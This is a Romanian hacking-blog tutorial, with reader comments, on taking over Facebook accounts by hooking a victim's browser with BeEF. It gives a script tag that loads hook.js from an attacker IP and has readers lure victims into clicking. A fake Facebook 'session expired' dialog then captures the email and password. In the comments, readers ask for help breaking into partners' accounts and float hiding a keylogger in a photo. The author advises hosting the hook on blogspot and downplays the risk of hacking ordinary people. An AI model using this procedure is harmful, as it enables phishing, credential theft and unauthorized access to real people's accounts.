Cum spargem un cont de Facebook utilizând ingineria socială [BeEF attack]

38

Bine ați revenit, dragii mei greenhorn hackers!

Multe persoane au accesat blogul blackweb.ro prin căutări de genul ,,cum spargi o parolă facebook“, ,,cum spargi un cont facebook“, ,,facebook hacking“, ,,soft de spart parole facebook gratuit”, ,,metode uluitoare de spart parole facebook”, ,,spargere parole facebook online”, ,,cum spargem parole facebook contra cost”, ,,program de spart parole facebook tpu beef”, ,,program de spart parole facebook online gratis beef”, ,,spargere cont facebook 2018″, ,,conturi de facebook sparte beef” și multe alte interogări. În primul rând, să nu credeți că o parolă facebook nu poate fi spartă. Totuși, lucrul acesta necesită anumite abilități, pe care le puteți dobândi doar dacă sunteți atenți puțin la ceea ce se postează pe blackweb.roUneori, dacă deții mici abilități, puțin noroc și puține cunoștințe de inginerie socială, poți obține datele de logare facebook ale oricărei persoane. Despre asta este acest tutorial. Dacă nu îți rezervi puțin timp să instalezi Black|Web și să înveți câteva lucruri despre Linux, citind tutorialele Blackweb.ro, această metodă nu va funcționa pentru tine, însă dacă îți rezervi puțin timp să studiezi aici pe Blackweb, o să reușești să obții datele de logare ale unui cont facebook cu această tehnică simplă.
(Toți utilizatorii facebook să fiți atenți, dacă nu doriți să fiți hackuiți!)

Pasul 1: Instalăm Black|Web OS (dacă nu cumva am făcut deja lucrul acesta)

Primul lucru pe care îl avem de făcut este să descărcăm Black|Web. De ce? Pentru că nu putem face un asemenea hack pe sistemul de operare Windows. În Black|Web există un program numit Browser Exploitation Framework (BeEF). Programul este capabil să ne ajute să preluăm controlul browserului victimelor noastre. O dată ce avem controlul browser-ului, sunt foarte multe lucruri pe care le putem face. Unul dintre aceste lucruri este să-i păcălim să ne ofere datele conturilor facebook.

Pasul 2: Deschidem BeEF

Deschidem Black|Web și o să fim întâmpinați de acest screen. Pornim BeEF dând click pe iconița cu văcuța din partea stângă a desktop-ului.

 

O să fim întâmpinați de ,,ecranul de pornire”, să-i spun așa. 

Aceasta poate fi partea cea mai dificilă a hack-ului, pentru un începător, însă pentru cineva care are cunoștințe medii, această parte este simplă ca ,,bună ziua”. Așadar, dacă sunteți începători, nu vă aventurați mai departe. O veți da în bară, cel mai probabil. Mai așteptați puțin și mai documentați-vă. În special pe Blackweb, deoarece este singurul blog din România care vă învața așa ceva.
La acest pas, trebuie să faceți victima să dea click pe un link care conține un cod JavaScript, pentru a le ,,prinde” browser-ul. Ca și cum așezați momeala în acul undiței.

Cea mai simplă metodă este de a insera codul în propriul site și a scrie un articol interesant pentru victimă. Lucrul acesta se poate face prin inserarea unui link într-un text precum: Click aici pentru mai multe detalii sau Click aici pentru a vizualiza clip-ul. Folosiți-vă imaginația!Scriptul arată ceva de genul:

<script src= “http://192.168.1.101:3000/hook.js&#8221 ; type= “text/javascript” ></script>

Pus într-o pagină web, iar atunci când cineva dă click pe el, tu deții controlul browser-ului. De aici, eu o să presupun că voi ați ,,agățat” browser-ul victimei.

Pasul 4: Trimitem o căsuță de dialog victimei

Atunci când am ,,agățat” browser-ul victimei, adresa IP, împreună cu pictogramele sistemului de operare și browser-ului ne va apărea în “Hooked Browsers” din partea stângă. Aici am utilizat browser-ul meu, pentru demonstrație. Chiar nu sunt atât de prost să fac o demonstrație utilizând o victimă, să le dau motiv ăstora să mă arunce la închisoare, pentru violarea corespondenței. Cât se mai dă? Între 3 și 5 ani?

Dacă dăm click pe browser-ul ,,agățat”, BeEF va deschide interfața în partea dreaptă. Observați că inițial avem detalii despre browser. Pe deasupra, mai avem câteva tab-uri. Momentan, pe noi ne interesează tab-ul ,,Commands”.

Acest modul ne permite să trimitem o fereastră pop-up în browser-ul victimei. În cazul nostru o să folosim căsuța de dialog Facebook.

Dacă dăm click pe ,,Dialog Type”, putem vedea că acest modul ne permite să mai creăm câte o căsuță de dialog și pentru LinkedIn, Windows, YouTube, Yammer, sau o căsuță de dialog generală. Selectăm ,,Facebook” în ,,Dialog Type”, apoi dăm click pe butonul ,,Execute”


Când dăm click pe ,,Execute” în BeEF, o căsuță de dialog apare în browser-ul victimei, precum cea de mai jos. Spune victimei că sesiunea Facebook a expirat și trebuie să își introducă din nou datele de logare.

Chiar dacă tu ești suspicios la vederea unui astfel de pop-up, cei mai mulți utilizatori chiar vor crede că sesiunea le-a expirat și vor introduce adresa de mail și parola.

Pasul 6: Adunăm datele

În interfața BeEF. putem vedea că aceste date apar în fereastra ,,COmmand results”. Victima a introdus adresa de mail și parola, iar acestea au fost capturate de BeEF.Dacă sunteți cu adevărat determinați să spargeți cât mai multe conturi facebook, trebuie să știți că lucrul acesta nu este imposibil, iar ceea ce v-am prezentat este doar una din multele metode de a face lucrul acesta (probabil aceasta este ce mai simplă).

Dacă vrei să dezvolți abilitățile unui hacker cu adevărat competent, poți începe chiar acum, pe Blackweb.ro. Te asigur că vei căpăta cea mai prețioasă abilitate a secolului 21 – hacking-ul.

Choose your Reaction!
 • daca m-ar putea ajuta care-va sunt ebrahim fatal alfo pe facebook va rog ajutati-ma ofe

  Reply
  • Lasă dracu’ hacăreala, Andreiuț! Pune mâna pe o carte de gramatică! 👍

   Reply
 • O simplă căutare o să vă arate că am peste 20 de volume publicate. În ultimul roman la care tocmai lucrez folosesc și un hacker pentru spargerea unui cont. Credeți că scena descrisă este veridică? Promit un volum cu autograf pentru această „consultanță” 🙂 Nu-l cunoșteam decât sub numele de Tache și nu aveam de la el decât un număr de telefon unde nu îmi răspundea nimeni, niciodată ci doar căsuța vocală unde lăsam un mesaj. Îl sunasem ieri și azi dimineața am primit un SMS prin care îmi era stabilită o întâlnire pentru azi la ora șase seara în fața la cofetăria Favorit.
  M-am plimbat de câteva ori în sus și în jos prin fața cofetăriei și abia după ce a trecut cu sfert de oră de ora șase m-am simțit apucat ușor de cot și dirijat spre parcul din apropiere. Mai întâi am crezut că mă conduce spre casa Ionelei dar nu am ajuns până acolo ci mi-a arătat o bancă sub o salcie pletoasă și ne-am așezat pe ea.
  După ce a privit atent în jur m-a întrebat pe un ton ușor amuzat:
  — Și cu aș putea să mai ajut eu literatura română astăzi?
  Mai apelasem de câteva ori la el și de fiecare dată a părut la fel de amuzat de simplitatea cererilor mele. Tariful lui obișnuit era de o mie de lei pentru un serviciu simplu dar de multe ori lucra pentru mine pro bono fiindcă nu i se părea normal să îmi ia o mie de lei pentru ceva care el probabil rezolva în câteva minute.
  Eu în schimb l-am privit cât de serios am putut și am spus pe un ton grav:
  — De data asta aș vrea să spargem contul Băncii Naționale.
  A început să râdă ușor și a spus:
  — Dacă am admirat ceva la dumneata domnule Zamfirescu a fost umorul de care dai dovadă și în viața de zi cu zi nu numai în scrierile dumitale. Sper să îți poți păstra umorul și în viitorul apropiat fiindcă te așteaptă zile grele. Extrem de grele…
  Am tresărit și am simțit un junghi în inimă apoi am spus:
  — Biopsia.
  A înclinat din cap tăcut și văzând că nu spun nimic a continuat:
  — Rezultatele biopsiei au sosit pe la amiază și au fost încărcate deja pe serverul clinicii dar prietenul dumitale doctorul Laurențiu Bercovici nu le-a validat așa că a trimis și proba martor la laborator. Noile rezultate vor veni mâine dar eu în locul dumitale nu prea mi-aș cumpăra aparatură electronică cu termen lung de garanție.
  Am plecat capul și am spus:
  — Mulțumesc de informație, mă bucur că am aflat din timp despre ce este vorba. Deși în sinea mea să știi că bănuiam.
  — Nu uita domnule Victor că eu și echipa mea lupt pentru libertatea informației așa că asta e eu v-o ofer indiferent dacă doare sau nu … și totuși de ce m-ai chemat?
  — Păi într-un fel este legat tot de asta. Într-un fel ciudat dar în mod sigur este legat fiindcă aș vrea când o fi să se întâmple să plec în mod elegant dincolo.
  — S-auzim, a spus el sec și a privit discret la ceas.
  Probabil că îi făcea plăcere să stea de vorbă cu mine dar lupta asta pentru libertatea informației are cerințele ei care nu se prea împacă cu taifasurile tihnite.
  — Cât de greu ar fi pentru dumneata să spargi un cont de Facebook? am întrebat eu și el m-a privit încruntat câteva secunde apoi a întrebat la rândul lui.
  — Asta se vrea un soi de glumă sau ce?
  Am negat cu capul și i-am răspuns:
  — Nici vorbă pur și simplu am așa o curiozitate. Mai ales că nu am contul de email asociat.
  A făcut o ușoară grimasă apoi a scos telefonul și a spus:
  — Bine, dați-mi numele contului.
  I-am spus numele contului a butonat câteva minute apoi a scos o foaie de hârtie a scris ceva pe ea apoi mi-a întins-o:
  — Asta este parola contului dar ține-ți minte că orice mesaj sau intervenție din partea dumneavoastră poate da naștere la bănuieli și această tânără superbă își va schimba parola.
  Am vrut să scot mia de lei pe care i-o dădeam de obicei dar a făcut cu palma în semn de negație:
  — Și de data asta este tot pro bono.
  S-a ridicat să plece și mi-a spus:
  — Dumneavoastră mai rămâneți câteva minute până ies eu din parc și abia pe urmă plecați.
  A făcut câțiva pași și din mers a spus parcă puțin trist:
  — Romanul la care lucrați este superb: tuturor colegiilor din echipa mea le-a plăcut la nebunie dar ar fi bine să vă grăbiți să-l terminați.
  S-a pierdut printre tufișurile dintre alei și a ieșit prin altă ieșire a parcului.

  Mulțumesc anticipat!

  Reply
  • Un hacker care să se prezinte cu numele/pseudonimul de Tache? Dați un search pe google la ,,hacking pseudonyms”, să vă faceți o idee… No offence, dar dacă un hacker s-ar prezenta cu numele de Tache, personal, l-aș considera puțin retardat.
   Pe deasupra, obișnuiți să mâncați virgule, iar ,,țineți” se scrie fără cratimă în exemplul dvs. Scriem cu cratimă dacă am spune ,,ține-ți minte propriul cod”. Desigur, mai sunt și alte greșeli, dar asta e treaba editorului dvs., nu a mea.

   Revenind la scena descrisă de dvs. Un cont de facebook se poate sparge în câteva minute butonând telefonul doar în filmele Hollywoodiene… care au un obicei tare prost de a prezenta hacking-ul exact așa cum nu este.

   Studiați și puțin legea, aruncați o privire pe art. 42 alin 2 din Legea 161/2003, cu privire la accesarea sistemelor informatice. Ce fel de hacker ar risca până la 12 ani de închisoare, pentru nici macar o mie de lei? 🙂 Cu atât mai puțin unul atât de ,,capabil”, cum încercați dvs. să-l prezentați pe domnul Tache. Un hacker, care presupunem că are o oarecare stimă de sine, nu lucrează pe o mie de lei… Asta dacă nu cumva e un adolescent, care și-a cheltuit banii de alocație.

   Reply
 • Referitor la spargerea unui cont de facebook folosind ingineria
  sociala , trebuie sa trimit persoanei in cauza un link cu o pagina web
  hostata , adica online ????
  Si scriptul din tutorial trebuie sa fie asemanator cu al vostru , as
  avea nevoie de putin ajutor

  Multumesc !!!

  Reply
  • Poți integra script-ul într-un blog hostat de blogspot, pe care este scris un articol de interes pentru victimă. Scriptul este oferit de Beef. Tot ce se schimbă este ip-ul.

   Reply
   • Ati putea sa faceti un tutorial in care sa ne prezentati cum trebuie sa ne protejam pentru a nu fi identificati?

    Reply
    • Avem un astfel de tutorial aici:

     https://blackweb.ro/cum-rutam-tot-traficul-din-kali-linux-prin-tor-utilizand-whonix/

     Totuși, trebuie să ținem minte un lucru: Cineva cu timp și resurse ne poate identifica oricând, indiferent de câte măsuri ne-am lua noi… Cei care spun că ei știu cum să rămână ,,complet invizibili”, mănâncă rahat cu ambele mâini. Personal, eu, un amărât de blogger, pot localiza și afla identitatea multora care doresc să rămână anonimi. Gândește-te ce ar putea face cineva’, cu mai multe cunoștințe ca ale mele și cu mulți bani la dispoziție… În special autoritățile. Că cei de la noi din țară sunt mai înceți la minte puțin și durează până-l înhață, asta-i partea a doua. Cert este că mai devreme sau mai târziu, tot îl înhață. Așadar, ar trebui să ne gândim de două ori, înainte să ne jucăm de-a pălăriile negre.

     Desigur, dacă spargem contu’ de facebook lu’ nea Vasile sau a lu’ țața Floarea, nu o să ni se întâmple nimic, dacă nu cumva ne-am lăudat că am făcut lucrul acesta.

     Reply
     • Tutorialul recomandat de dv. este doar pentru cei care folosesc kali linux pe virtualbox ca si sistem de operare secundar, nu?
      Eu voiam niste sfaturi despre cum ne-am putea proteja identitatea atunci cand avem kali linux ca si sistem de operare principal.

     • Tutorialul prezentat este pentru cei care doresc să utilizeze Kali+Whonix prin Virtualbox, ceea ce este puțin mai greu.

      Dacă aveți Kali instalat, puneți whonix pe un stick usb și îl rulați direct din Kali. Mai multe detalii pe:
      https://www.whonix.org/wiki/Download

      Acum, să răspund și la întrebarea de mai jos, dacă utilizatorul este pe fb utilizând aplicația fb pentru mobil, metoda nu va funcționa. Va trebui să așteptați să fie conectat de pe pc, înainte să inițiați atacul.

   • Metoda este valabila daca persoana in cauza foloseste un telefon mobil cu android sau ios???

    Reply
     • Si o metoda de spart parola la facebook cand este conectat de pe telefon exista ? 😀

     • Există, dar e nevoie de mai multă creativitate. 🙂

     • @Bianca: Există secțiunea “Contact”. Însă te rog să citești cu mare atenție ce scrie acolo, înainte de a trimite mesajul.

     • Ma poti ajuta si pe mine

     • Solicit ajutorul dvs. contracost.Astept raspuns.Multumesc!

     • O să presupun că nu ați citit ce scrie la secțiunea CONTACT, de aceea citez:
      “Nu ne contactați pentru a ne ruga să spargem parolele iubiților, iubitelor, amanților, amantelor, sau a soților și soțiilor care vă înșală. Adresați-vă unui psiholog, faceți o terapie de cuplu, divorțați, sau orice altceva, însă nu ne mai deranjați cu astfel de lucruri. ”

      Ajutorul nostru, contracost, se oferă doar celor care doresc să le verificăm securitatea sistemelor.

 • Ma m uitat pe blog si am vazut soc soc soc, cum poti sparge un cont de facebook, eu am incercat si la beef cand vreau sa ma log, nu pot scrie nimic. ( daca ma poti ajuta ) adica daca dau control + a vad ce este scris dar nu merg user sau pass

  Reply
 • Buna!Exista vreo metoda de a afla parola cuiva de facebook,fara a interactiona cu acesta?fara a-i trimite vreun mesaj sau link ?ca asa as putea trimite o poza sau orice altceva in care e ascuns un keylogger,sa-l pun sa l descarce si gata,dar o persoana cu mai mult de un neuron ar deveni suspicioasa…

  Reply
 • Buna!Aceasta metoda functioneaza si daca victima acceseaza site-ul de pe mobil?

  Reply
 • Va rog daca ma poate ajuta cineva sa imi sparga un cont facebook, ofer bani!

  Reply
 • Vreau sa aflu parola de la Facebook a lui iubita mea și nu știu cum să fac?

  Reply
Leave a Comment

Your email address will not be published.

Opțiunea copy-paste a fost dezactivată pentru acest site.